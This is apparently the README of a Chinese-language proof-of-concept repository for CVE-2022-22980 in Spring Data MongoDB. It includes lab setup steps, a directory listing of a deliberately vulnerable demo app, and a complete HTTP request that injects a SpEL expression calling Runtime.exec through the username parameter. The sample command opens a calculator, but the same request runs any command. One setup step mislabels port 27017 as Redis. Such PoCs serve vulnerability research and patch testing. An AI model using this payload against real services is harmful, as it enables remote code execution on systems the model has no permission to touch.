CVE-2022-22980 exp && 靶场# spring-data-mongodb-cve-2022-22980-exp
鸡肋漏洞,只是记录。
1. 启动redis,27017端口
2. 启动项目,springboot启动在6666端口

3. 
```
GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
```
参考:
- https://github.com/li8u99/Spring-Data-Mongodb-Demo
- https://github.com/trganda/CVE-2022-22980
[4.0K] /data/pocs/ce1aa477f09651c7ff08f78142e371e553278fac
├── [4.0K] docs
│ ├── [505K] image-20220622155615142.png
│ └── [364K] image-20220622155830238.png
├── [1.7K] pom.xml
├── [ 793] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] mongodb
│ ├── [4.0K] controller
│ │ └── [1.2K] UserController.java
│ ├── [4.0K] model
│ │ └── [ 852] User.java
│ ├── [ 323] MongoExampleApplication.java
│ └── [4.0K] repository
│ └── [ 371] UserRepository.java
└── [4.0K] resources
└── [ 124] application.properties
11 directories, 9 files